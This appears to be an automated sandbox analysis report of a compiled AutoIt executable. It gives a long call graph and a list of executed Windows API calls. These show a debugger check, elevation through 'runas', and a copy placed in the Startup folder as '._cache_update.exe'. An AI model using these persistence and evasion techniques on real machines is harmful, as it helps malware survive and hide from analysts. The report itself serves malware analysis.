109724->109725 109767 f70300 104 API calls _free 109725->109767 109727 f214a0 48 API calls 109727->109732 109728 f6fc56 109728->109723 109729 f6fc6f FreeLibrary 109728->109729 109729->109723 109731 f1d89e 50 API calls 109731->109732 109732->109727 109732->109728 109732->109731 109769 f70300 104 API calls _free 109732->109769 109734 f1b8a7 48 API calls 109733->109734 109735 f70473 CharLowerBuffW 109734->109735 109736 f6267a 60 API calls 109735->109736 109737 f70494 109736->109737 109739 f1d3d2 48 API calls 109737->109739 109744 f704cf Mailbox 109737->109744 109740 f704ac 109739->109740 109741 f17f40 48 API calls 109740->109741 109742 f704c3 109741->109742 109743 f1a2fb 48 API calls 109742->109743 109743->109744 109745 f7050b Mailbox 109744->109745 109770 f6fc96 60 API calls 2 library calls 109744->109770 109745->109718 109747 f6f616 109746->109747 109751 f6f66b 109746->109751 109748 f3010a 48 API calls 109747->109748 109750 f6f638 109748->109750 109749 f3010a 48 API calls 109749->109750 109750->109749 109750->109751 109752 f70719 109751->109752 109753 f70944 Mailbox 109752->109753 109758 f7073c _strcat _wcscpy __wsetenvp 109752->109758 109753->109713 109754 f1d00b 58 API calls 109754->109758 109755 f1cdb4 48 API calls 109755->109758 109756 f184a6 80 API calls 109756->109758 109757 f345ec 47 API calls _W_store_winword 109757->109758 109758->109753 109758->109754 109758->109755 109758->109756 109758->109757 109771 f58932 50 API calls __wsetenvp 109758->109771 109761 f2f941 109760->109761 109762 f2f9d9 select 109761->109762 109763 f2f9a7 109761->109763 109762->109763 109763->109716 109763->109717 109764->109718 109765->109718 109766->109721 109767->109732 109768->109705 109769->109732 109770->109745 109771->109758 109772->108264 109773->108297 109774->108302 109775 f21118 109776 f2e016 50 API calls 109775->109776 109777 f2112e 109776->109777 109778 f8abeb 109777->109778 109779 f21148 109777->109779 109844 f2cf79 49 API calls 109778->109844 109781 f23680 401 API calls 109779->109781 109821 f1fad8 Mailbox _memmove 109781->109821 109783 f8ac2a 109786 f8ac4a Mailbox 109783->109786 109845 f5ba5d 48 API calls 109783->109845 109784 f8b628 Mailbox 109848 f5d520 85 API calls 4 library calls 109786->109848 109787 f20119 109851 f5d520 85 API calls 4 library calls 109787->109851 109790 f2105e 109795 f1c935 48 API calls 109790->109795 109791 f20dee 109796 f1d89e 50 API calls 109791->109796 109793 f20dfa 109798 f1d89e 50 API calls 109793->109798 109794 f8b772 109852 f5d520 85 API calls 4 library calls 109794->109852 109808 f1fbf1 Mailbox 109795->109808 109796->109793 109797 f21063 109850 f5d520 85 API calls 4 library calls 109797->109850 109802 f20e83 109798->109802 109799 f1f6d0 401 API calls 109799->109821 109800 f1c935 48 API calls 109800->109821 109807 f1caee 48 API calls 109802->109807 109803 f1d3d2 48 API calls 109803->109821 109805 f8b7d2 109806 f31b2a 52 API calls __cinit 109806->109821 109816 f210f1 Mailbox 109807->109816 109810 f21230 109810->109808 109849 f5d520 85 API calls 4 library calls 109810->109849 109813 f3010a 48 API calls 109813->109821 109814 f1fa40 401 API calls 109814->109821 109847 f5d520 85 API calls 4 library calls 109816->109847 109818 f4a599 InterlockedDecrement 109818->109821 109819 f8b583 109846 f5d520 85 API calls 4 library calls 109819->109846 109821->109787 109821->109790 109821->109791 109821->109793 109821->109794 109821->109797 109821->109799 109821->109800 109821->109802 109821->109803 109821->109806 109821->109808 109821->109810 109821->109813 109821->109814 109821->109816 109821->109818 109821->109819 109822 f6013f 86 API calls 109821->109822 109823 f2f03e 2 API calls 109821->109823 109824 f70bfa 128 API calls 109821->109824 109825 f71f19 129 API calls 109821->109825 109826 f150a3 49 API calls 109821->109826 109827 f710e5 81 API calls 109821->109827 109828 f68065 55 API calls 109821->109828 109829 f2f461 97 API calls 109821->109829 109830 f69122 90 API calls 109821->109830 109831 f692c0 87 API calls 109821->109831 109832 f2dd84 3 API calls 109821->109832 109833 f7804e 112 API calls 109821->109833 109834 f7798d 108 API calls 109821->109834 109835 f730ad 89 API calls 109821->109835 109836 f6b74b 401 API calls 109821->109836 109837 f717aa 86 API calls 109821->109837 109838 f2ef0d 93 API calls 109821->109838 109839 f21620 59 API calls Mailbox 109821->109839 109840 f6ee52 81 API calls 2 library calls 109821->109840 109841 f6ef9d 89 API calls Mailbox 109821->109841 109842 f5b020 48 API calls 109821->109842 109843 f6e713 401 API calls Mailbox 109821->109843 109822->109821 109823->109821 109824->109821 109825->109821 109826->109821 109827->109821 109828->109821 109829->109821 109830->109821 109831->109821 109832->109821 109833->109821 109834->109821 109835->109821 109836->109821 109837->109821 109838->109821 109839->109821 109840->109821 109841->109821 109842->109821 109843->109821 109844->109783 109845->109786 109846->109816 109847->109808 109848->109784 109849->109797 109850->109787 109851->109794 109852->109805 109853 f81eca 109858 f2be17 109853->109858 109857 f81ed9 109859 f1d3d2 48 API calls 109858->109859 109860 f2be85 109859->109860 109867 f2c929 109860->109867 109862 f8db92 109864 f2bf22 109864->109862 109865 f2bf3e 109864->109865 109870 f2c8b7 48 API calls _memmove 109864->109870 109866 f31b2a 52 API calls __cinit 109865->109866 109866->109857 109871 f2c955 109867->109871 109870->109864 109872 f2c948 109871->109872 109873 f2c962 109871->109873 109872->109864 109873->109872 109874 f2c969 RegOpenKeyExW 109873->109874 109874->109872 109875 f2c983 RegQueryValueExW 109874->109875 109876 f2c9a4 109875->109876 109877 f2c9b9 RegCloseKey 109875->109877 109876->109877 109877->109872 109878 f36a80 109879 f36a8c _doexit 109878->109879 109915 f38b7b GetStartupInfoW 109879->109915 109881 f36a91 109917 f3a937 GetProcessHeap 109881->109917 109883 f36ae9 109884 f36af4 109883->109884 109999 f36bd0 47 API calls 3 library calls 109883->109999 109918 f387d7 109884->109918 109887 f36afa 109888 f36b05 __RTC_Initialize 109887->109888 110000 f36bd0 47 API calls 3 library calls 109887->110000 109939 f3ba66 109888->109939 109891 f36b14 109892 f36b20 GetCommandLineW 109891->109892 110001 f36bd0 47 API calls 3 library calls 109891->110001 109958 f43c2d GetEnvironmentStringsW 109892->109958 109895 f36b1f 109895->109892 109898 f36b3a 109899 f36b45 109898->109899 110002 f31d7b 47 API calls 3 library calls 109898->110002 109968 f43a64 109899->109968 109902 f36b4b 109903 f36b56 109902->109903 110003 f31d7b 47 API calls 3 library calls 109902->110003 109982 f31db5 109903->109982 109916 f38b91 109915->109916 109916->109881 109917->109883 110007 f31e5a 30 API calls 2 library calls 109918->110007 109920 f387dc 110008 f38ab3 InitializeCriticalSectionAndSpinCount 109920->110008 109922 f387e1 109923 f387e5 109922->109923 110010 f38afd TlsAlloc 109922->110010 110009 f3884d 50 API calls 2 library calls 109923->110009 109926 f387ea 109926->109887 109927 f387f7 109927->109923 109928 f38802 109927->109928 110011 f37616 109928->110011 109931 f38844 110019 f3884d 50 API calls 2 library calls 109931->110019 109934 f38823 109934->109931 109936 f38829 109934->109936 109935 f38849 109935->109887 110018 f38724 47 API calls 4 library calls 109936->110018 109938 f38831 GetCurrentThreadId 109938->109887 109940 f3ba72 _doexit 109939->109940 110028 f38984 109940->110028 109942 f3ba79 109943 f37616 __calloc_crt 47 API calls 109942->109943 109944 f3ba8a 109943->109944 109945 f3baf5 GetStartupInfoW 109944->109945 109947 f3ba95 _doexit @_EH4_CallFilterFunc@8 109944->109947 109949 f3bc33 109945->109949 109950 f3bb0a 109945->109950 109946 f3bcf7 110035 f3bd0b RtlLeaveCriticalSection _doexit 109946->110035 109947->109891 109949->109946 109951 f3bc7c GetStdHandle 109949->109951 109953 f3bc8e GetFileType 109949->109953 109955 f3bcbb InitializeCriticalSectionAndSpinCount 109949->109955 109950->109949 109952 f37616 __calloc_crt 47 API calls 109950->109952 109954 f3bb58 109950->109954 109951->109949 109952->109950 109953->109949 109954->109949 109956 f3bb8a GetFileType 109954->109956 109957 f3bb98 InitializeCriticalSectionAndSpinCount 109954->109957 109955->109949 109956->109954 109956->109957 109957->109954 109959 f36b30 109958->109959 109960 f43c3e 109958->109960 109964 f4382b GetModuleFileNameW 109959->109964 109961 f37660 __malloc_crt 47 API calls 109960->109961 109962 f43c64 _memmove 109961->109962 109963 f43c7a FreeEnvironmentStringsW 109962->109963 109963->109959 109965 f4385f _wparse_cmdline 109964->109965 109966 f37660 __malloc_crt 47 API calls 109965->109966 109967 f4389f _wparse_cmdline 109965->109967 109966->109967 109967->109898 109969 f43a75 109968->109969 109970 f43a7d __wsetenvp 109968->109970 109969->109902 109971 f37616 __calloc_crt 47 API calls 109970->109971 109978 f43aa6 __wsetenvp 109971->109978 109972 f328ca _free 47 API calls 109972->109969 109973 f43afd 109973->109972 109974 f37616 __calloc_crt 47 API calls 109974->109978 109975 f43b22 109977 f328ca _free 47 API calls 109975->109977 109977->109969 109978->109969 109978->109973 109978->109974 109978->109975 109979 f43b39 109978->109979 110078 f43317 47 API calls 2 library calls 109978->110078 110079 f37ab0 IsProcessorFeaturePresent 109979->110079 109983 f31dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 109982->109983 109999->109884 110000->109888 110001->109895 110007->109920 110008->109922 110009->109926 110010->109927 110013 f3761d 110011->110013 110014 f3765a 110013->110014 110015 f3763b Sleep 110013->110015 110020 f43e5a 110013->110020 110014->109931 110017 f38b59 TlsSetValue 110014->110017 110016 f37652 110015->110016 110016->110013 110016->110014 110017->109934 110018->109938 110019->109935 110021 f43e65 110020->110021 110025 f43e80 __calloc_impl 110020->110025 110022 f43e71 110021->110022 110021->110025 110027 f3889e 47 API calls __getptd_noexit 110022->110027 110023 f43e90 RtlAllocateHeap 110023->110025 110026 f43e76 110023->110026 110025->110023 110025->110026 110026->110013 110027->110026 110029 f38995 110028->110029 110030 f389a8 RtlEnterCriticalSection 110028->110030 110036 f38a0c 110029->110036 110030->109942 110032 f3899b 110032->110030 110059 f31d7b 47 API calls 3 library calls 110032->110059 110035->109947 110037 f38a18 _doexit 110036->110037 110038 f38a21 110037->110038 110039 f38a39 110037->110039 110060 f38e52 47 API calls 2 library calls 110038->110060 110044 f38a59 _doexit 110039->110044 110063 f37660 110039->110063 110041 f38a26 110061 f38eb2 47 API calls 8 library calls 110041->110061 110044->110032 110046 f38a2d 110062 f31d65 GetModuleHandleExW 6C3C6DE0 ExitProcess ___crtCorExitProcess 110046->110062 110047 f38a63 110051 f38984 __lock 46 API calls 110047->110051 110048 f38a54 110069 f3889e 47 API calls __getptd_noexit 110048->110069 110052 f38a6a 110051->110052 110054 f38a79 InitializeCriticalSectionAndSpinCount 110052->110054 110055 f38a8e 110052->110055 110056 f38a94 110054->110056 110070 f328ca 110055->110070 110076 f38aaa RtlLeaveCriticalSection _doexit 110056->110076 110060->110041 110061->110046 110066 f3766e 110063->110066 110064 f345ec _W_store_winword 46 API calls 110064->110066 110065 f376a2 110065->110047 110065->110048 110066->110064 110066->110065 110067 f37681 Sleep 110066->110067 110068 f3769a 110067->110068 110068->110065 110068->110066 110069->110044 110071 f328d3 RtlFreeHeap 110070->110071 110072 f328fc _free 110070->110072 110071->110072 110073 f328e8 110071->110073 110072->110056 110077 f3889e 47 API calls __getptd_noexit 110073->110077 110075 f328ee GetLastError 110075->110072 110076->110044 110077->110075 110078->109978 110867 f81e8b 110872 f2e44f 110867->110872 110871 f81e9a 110873 f3010a 48 API calls 110872->110873 110874 f2e457 110873->110874 110875 f2e46b 110874->110875 110880 f2e74b 110874->110880 110879 f31b2a 52 API calls __cinit 110875->110879 110879->110871 110881 f2e463 110880->110881 110882 f2e754 110880->110882 110884 f2e47b 110881->110884 110912 f31b2a 52 API calls __cinit 110882->110912 110885 f1d3d2 48 API calls 110884->110885 110886 f2e492 GetVersionExW 110885->110886 110887 f17e53 48 API calls 110886->110887 110888 f2e4d5 110887->110888 110913 f2e5f8 110888->110913 110891 f2e617 48 API calls 110896 f2e4e9 110891->110896 110894 f829f9 110895 f2e55f GetCurrentProcess 110926 f2e70e LoadLibraryA 6C3C6DE0 110895->110926 110896->110894 110917 f2e6d1 110896->110917 110898 f2e59e 110920 f2e694 110898->110920 110899 f2e5ec GetSystemInfo 110901 f2e5c9 110899->110901 110903 f2e5d7 FreeLibrary 110901->110903 110904 f2e5dc 110901->110904 110903->110904 110904->110875 110905 f2e5e4 GetSystemInfo 110908 f2e5be 110905->110908 110906 f2e5b4 110923 f2e437 110906->110923 110908->110901 110911 f2e5c4 FreeLibrary 110908->110911 110909 f2e576 110909->110898 110909->110899 110911->110901 110912->110881 110914 f2e601 110913->110914 110915 f1a2fb 48 API calls 110914->110915 110916 f2e4dd 110915->110916 110916->110891 110927 f2e6e3 110917->110927 110931 f2e6a6 110920->110931 110924 f2e694 2 API calls 110923->110924 110925 f2e43f GetNativeSystemInfo 110924->110925 110925->110908 110926->110909 110928 f2e55b 110927->110928 110929 f2e6ec LoadLibraryA 110927->110929 110928->110895 110928->110909 110929->110928 110930 f2e6fd 6C3C6DE0 110929->110930 110930->110928 110932 f2e5ac 110931->110932 110933 f2e6af LoadLibraryA 110931->110933 110932->110905 110932->110906 110933->110932 110934 f2e6c0 6C3C6DE0 110933->110934 110934->110932 110935 f129c2 110936 f129cb 110935->110936 110937 f129e9 110936->110937 110938 f12a48 110936->110938 110976 f12a46 110936->110976 110942 f129f6 110937->110942 110943 f12aac PostQuitMessage 110937->110943 110940 f82307 110938->110940 110941 f12a4e 110938->110941 110939 f12a2b NtdllDefWindowProc_W 110969 f12a39 110939->110969 110990 f1322e 16 API calls 110940->110990 110944 f12a53 110941->110944 110945 f12a76 SetTimer RegisterClipboardFormatW 110941->110945 110947 f12a01 110942->110947 110948 f8238f 110942->110948 110943->110969 110949 f822aa 110944->110949 110950 f12a5a KillTimer 110944->110950 110952 f12a9f CreatePopupMenu 110945->110952 110945->110969 110953 f12ab6 110947->110953 110954 f12a09 110947->110954 110996 f557fb 60 API calls _memset 110948->110996 110960 f822af 110949->110960 110961 f822e3 MoveWindow 110949->110961 110987 f12b94 Shell_NotifyIconW _memset 110950->110987 110951 f8232e 110991 f2ec33 401 API calls Mailbox 110951->110991 110952->110969 110980 f11e58 110953->110980 110958 f12a14 110954->110958 110965 f82374 110954->110965 110966 f12a1f 110958->110966 110967 f8235f 110958->110967 110962 f822d2 SetFocus 110960->110962 110963 f822b3 110960->110963 110961->110969 110962->110969 110963->110966 110970 f822bc 110963->110970 110964 f12a6d 110988 f12ac7 DeleteObject DestroyWindow Mailbox 110964->110988 110965->110939 110995 f4b31f 48 API calls 110965->110995 110966->110939 110992 f12b94 Shell_NotifyIconW _memset 110966->110992 110994 f55fdb 70 API calls _memset 110967->110994 110968 f823a1 110968->110939 110968->110969 110989 f1322e 16 API calls 110970->110989 110975 f8236f 110975->110969 110976->110939 110978 f82353 110993 f13598 67 API calls _memset 110978->110993 110981 f11ef1 110980->110981 110982 f11e6f _memset 110980->110982 110981->110969 110997 f138e4 110982->110997 110984 f11eda KillTimer SetTimer 110984->110981 110985 f11e96 110985->110984 110986 f84518 Shell_NotifyIconW 110985->110986 110986->110984 110987->110964 110988->110969 110989->110969 110990->110951 110991->110966 110992->110978 110993->110976 110994->110975 110995->110976 110996->110968 110998 f13900 110997->110998 111018 f139d5 Mailbox 110997->111018 111019 f17b6e 48 API calls 110998->111019 111000 f1390e 111001 f8453f LoadStringW 111000->111001 111002 f1391b 111000->111002 111005 f84559 111001->111005 111003 f17e53 48 API calls 111002->111003 111004 f13930 111003->111004 111004->111005 111006 f13941 111004->111006 111021 f139e8 48 API calls 2 library calls 111005->111021 111008 f1394b 111006->111008 111009 f139da 111006->111009 111020 f139e8 48 API calls 2 library calls 111008->111020 111011 f1c935 48 API calls 111009->111011 111010 f84564 111013 f84578 111010->111013 111015 f13956 _memset _wcscpy 111010->111015 111011->111015 111022 f139e8 48 API calls 2 library calls 111013->111022 111017 f139ba Shell_NotifyIconW 111015->111017 111016 f84586 111017->111018 111018->110985 111019->111000 111020->111015 111021->111010 111022->111016 111023 f81eed 111028 f2e975 111023->111028 111025 f81f01 111044 f31b2a 52 API calls __cinit 111025->111044 111027 f81f0b 111029 f3010a 48 API calls 111028->111029 111030 f2ea27 GetModuleFileNameW 111029->111030 111031 f3297d __wsplitpath 47 API calls 111030->111031 111032 f2ea5b _wcsncat 111031->111032 111045 f32bff 111032->111045 111035 f3010a 48 API calls 111036 f2ea94 _wcscpy 111035->111036 111037 f1d3d2 48 API calls 111036->111037 111038 f2eacf 111037->111038 111048 f2eb05 111038->111048 111040 f2eae0 Mailbox 111040->111025 111041 f1a4f6 48 API calls 111043 f2eada _wcscat __wsetenvp _wcsncpy 111041->111043 111042 f3010a 48 API calls 111042->111043 111043->111040 111043->111041 111043->111042 111044->111027 111061 f3aab9 111045->111061 111049 f1c4cd 48 API calls 111048->111049 111050 f2eb14 RegOpenKeyExW 111049->111050 111051 f2eb35 111050->111051 111052 f84b17 RegQueryValueExW 111050->111052 111051->111043 111053 f84b30 111052->111053 111058 f84b86 111052->111058 111054 f3010a 48 API calls 111053->111054 111055 f84b49 111054->111055 111056 f14bce 48 API calls 111055->111056 111057 f84b53 RegQueryValueExW 111056->111057 111057->111058 111059 f84b6f 111057->111059 111060 f17e53 48 API calls 111059->111060 111060->111058 111062 f3abc6 111061->111062 111063 f3aaca 111061->111063 111071 f3889e 47 API calls __getptd_noexit 111062->111071 111063->111062 111064 f3aad5 111063->111064 111068 f2ea8a 111064->111068 111070 f3889e 47 API calls __getptd_noexit 111064->111070 111066 f3abbb 111072 f37aa0 8 API calls __cftoe2_l 111066->111072 111068->111035 111070->111066 111071->111066 111072->111068 111073 10730b0 111074 10730c0 111073->111074 111075 10731da LoadLibraryA 111074->111075 111078 107321f VirtualProtect VirtualProtect 111074->111078 111076 10731f1 111075->111076 111076->111074 111080 1073203 6C3C6DE0 111076->111080 111079 1073284 111078->111079 111079->111079 111080->111076 111081 1073219 ExitProcess 111080->111081 111082 f1e849 111085 f226c0 111082->111085 111084 f1e852 111086 f8862d 111085->111086 111087 f2273b 111085->111087 111207 f5d520 85 API calls 4 library calls 111086->111207 111089 f22adc 111087->111089 111090 f2277c 111087->111090 111099 f2279a 111087->111099 111206 f1d349 53 API calls 111089->111206 111130 f228f6 111090->111130 111202 f1d500 53 API calls __cinit 111090->111202 111091 f8863e 111208 f5d520 85 API calls 4 library calls 111091->111208 111092 f22a84 111100 f1d380 55 API calls 111092->111100 111093 f227cf 111093->111091 111095 f227db 111093->111095 111097 f227ef 111095->111097 111111 f8865a 111095->111111 111101 f22806 111097->111101 111102 f886c9 111097->111102 111099->111092 111099->111093 111115 f22914 111099->111115 111104 f22aab 111100->111104 111105 f1fa40 401 API calls 111101->111105 111103 f88ac9 111102->111103 111106 f1fa40 401 API calls 111102->111106 111223 f5d520 85 API calls 4 library calls 111103->111223 111108 f1d2d2 53 API calls 111104->111108 111143 f2281d 111105->111143 111109 f886ee 111106->111109 111108->111115 111117 f1d89e 50 API calls 111109->111117 111122 f8870a 111109->111122 111126 f229ec 111109->111126 111111->111102 111111->111126 111209 f6f211 401 API calls 111111->111209 111210 f6f4df 401 API calls 111111->111210 111112 f88980 111218 f5d520 85 API calls 4 library calls 111112->111218 111118 f1cdb4 48 API calls 111115->111118 111116 f22836 111116->111103 111120 f1fa40 401 API calls 111116->111120 111117->111122 111124 f2296e 111118->111124 111119 f228cc 111119->111130 111203 f1cf97 58 API calls 111119->111203 111146 f2287c 111120->111146 111121 f1c935 48 API calls 111121->111116 111129 f8878d 111122->111129 111211 f1346e 48 API calls 111122->111211 111124->111126 111134 f22984 111124->111134 111135 f88a97 111124->111135 111141 f889b4 111124->111141 111125 f228ac 111125->111119 111216 f1cf97 58 API calls 111125->111216 111126->111084 111128 f8883f 111214 f6c235 401 API calls Mailbox 111128->111214 111129->111128 111133 f8882d 111129->111133 111212 f54e71 53 API calls __cinit 111129->111212 111139 f22900 111130->111139 111217 f1cf97 58 API calls 111130->111217 111136 f1ca8e 48 API calls 111133->111136 111134->111135 111204 f241fc 83 API calls 111134->111204 111135->111126 111222 f14b02 50 API calls 111135->111222 111136->111128 111137 f88888 111137->111143 111144 f8888c 111137->111144 111139->111112 111139->111115 111188 f6bf80 111141->111188 111143->111116 111143->111121 111143->111126 111215 f5d520 85 API calls 4 library calls 111144->111215 111146->111125 111146->111126 111150 f1fa40 401 API calls 111146->111150 111147 f229b8 111149 f88a7e 111147->111149 111205 f241fc 83 API calls 111147->111205 111221 f2ee93 83 API calls 111149->111221 111155 f888ff 111150->111155 111151 f88725 111151->111133 111163 f214a0 48 API calls 111151->111163 111155->111126 111162 f1d89e 50 API calls 111155->111162 111156 f889f3 111169 f88a01 111156->111169 111170 f88a42 111156->111170 111157 f88813 111160 f1d89e 50 API calls 111157->111160 111158 f887ca 111158->111157 111161 f184a6 80 API calls 111158->111161 111159 f229ca 111159->111126 111165 f88a6f 111159->111165 111166 f229e5 111159->111166 111164 f88821 111160->111164 111177 f887e0 111161->111177 111162->111125 111167 f8875d 111163->111167 111168 f1d89e 50 API calls 111164->111168 111220 f6d1da 50 API calls 111165->111220 111171 f3010a 48 API calls 111166->111171 111167->111133 111175 f214a0 48 API calls 111167->111175 111168->111133 111172 f1ca8e 48 API calls 111169->111172 111173 f1d89e 50 API calls 111170->111173 111171->111126 111172->111126 111176 f88a4b 111173->111176 111178 f88775 111175->111178 111179 f1d89e 50 API calls 111176->111179 111177->111157 111213 f5a76d 49 API calls 111177->111213 111182 f1d89e 50 API calls 111178->111182 111183 f88a57 111179->111183 111181 f88807 111184 f1d89e 50 API calls 111181->111184 111185 f88781 111182->111185 111219 f14b02 50 API calls 111183->111219 111184->111157 111187 f1d89e 50 API calls 111185->111187 111187->111129 111193 f6bfd9 _memset 111188->111193 111190 f6c22e 111190->111156 111191 f6c14c 111192 f6c19f VariantInit VariantClear 111191->111192 111196 f6c033 111191->111196 111194 f6c1c5 111192->111194 111193->111191 111195 f6c097 VariantInit 111193->111195 111193->111196 111194->111196 111197 f6c1e6 111194->111197 111200 f6c0d6 111195->111200 111226 f6c235 401 API calls Mailbox 111196->111226 111225 f5a6f6 102 API calls 111197->111225 111199 f6c20d VariantClear 111199->111190 111200->111196 111224 f5a6f6 102 API calls 111200->111224 111202->111099 111203->111130 111204->111147 111205->111159 111206->111125 111207->111091 111208->111111 111209->111111 111210->111111 111211->111151 111212->111158 111213->111181 111214->111137 111215->111126 111216->111119 111217->111139 111218->111126 111219->111126 111220->111149 111221->111135 111222->111103 111223->111126 111224->111191 111225->111199 111226->111190 111227 f1e8eb 111228 f22b40 401 API calls 111227->111228 111229 f1e8f7 111228->111229 111230 f8bc25 111231 f8bc27 111230->111231 111234 f579f8 SHGetFolderPathW 111231->111234 111233 f8bc30 111233->111233 111235 f17e53 48 API calls 111234->111235 111236 f57a25 111235->111236 111236->111233 111237 f8c146 GetUserNameW

                                                                                                                                Executed Functions

                                                                                                                                Function 00F1374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00F1376D
                                                                                                                                  • Part of subcall function 00F14257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 00F1428C
                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?), ref: 00F1377F
                                                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00FD1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00FD1124,?,?), ref: 00F137EE
                                                                                                                                  • Part of subcall function 00F134F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00F1352A
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F13860
                                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00FC2934,00000010), ref: 00F821C5
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00F821FD
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00F82232
                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FADAA4), ref: 00F82290
                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00F82297
                                                                                                                                  • Part of subcall function 00F130A5: GetSysColorBrush.USER32(0000000F), ref: 00F130B0
                                                                                                                                  • Part of subcall function 00F130A5: LoadCursorW.USER32(00000000,00007F00), ref: 00F130BF
                                                                                                                                  • Part of subcall function 00F130A5: LoadIconW.USER32(00000063), ref: 00F130D5
                                                                                                                                  • Part of subcall function 00F130A5: LoadIconW.USER32(000000A4), ref: 00F130E7
                                                                                                                                  • Part of subcall function 00F130A5: LoadIconW.USER32(000000A2), ref: 00F130F9
                                                                                                                                  • Part of subcall function 00F130A5: RegisterClassExW.USER32(?), ref: 00F13167
                                                                                                                                  • Part of subcall function 00F12E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F12ECB
                                                                                                                                  • Part of subcall function 00F12E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F12EEC
                                                                                                                                  • Part of subcall function 00F12E9D: ShowWindow.USER32(00000000), ref: 00F12F00
                                                                                                                                  • Part of subcall function 00F12E9D: ShowWindow.USER32(00000000), ref: 00F12F09
                                                                                                                                  • Part of subcall function 00F13598: _memset.LIBCMT ref: 00F135BE
                                                                                                                                  • Part of subcall function 00F13598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13667
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, xrefs: 00F137B4, 00F137E9, 00F137FD, 00F82257
                                                                                                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00F821BE
                                                                                                                                • runas, xrefs: 00F8228B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                • API String ID: 4253510256-2843960942
                                                                                                                                • Opcode ID: 4693fe60aeef1c9537c6a39b2166fe1a999b4a3a6a7addaa889cc87b0c67d5a8
                                                                                                                                • Instruction ID: 461ea4c9ee1fe4d973ab95a5886177ff2eaca7014ac023a4f3ad0a831bb26906
                                                                                                                                • Opcode Fuzzy Hash: 4693fe60aeef1c9537c6a39b2166fe1a999b4a3a6a7addaa889cc87b0c67d5a8
                                                                                                                                • Instruction Fuzzy Hash: 44512972A44248BBDB10BBB0EC47FED3B7EAB55720F14005BF64192192C6748AC5FB62
                                                                                                                                Function 00F129C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
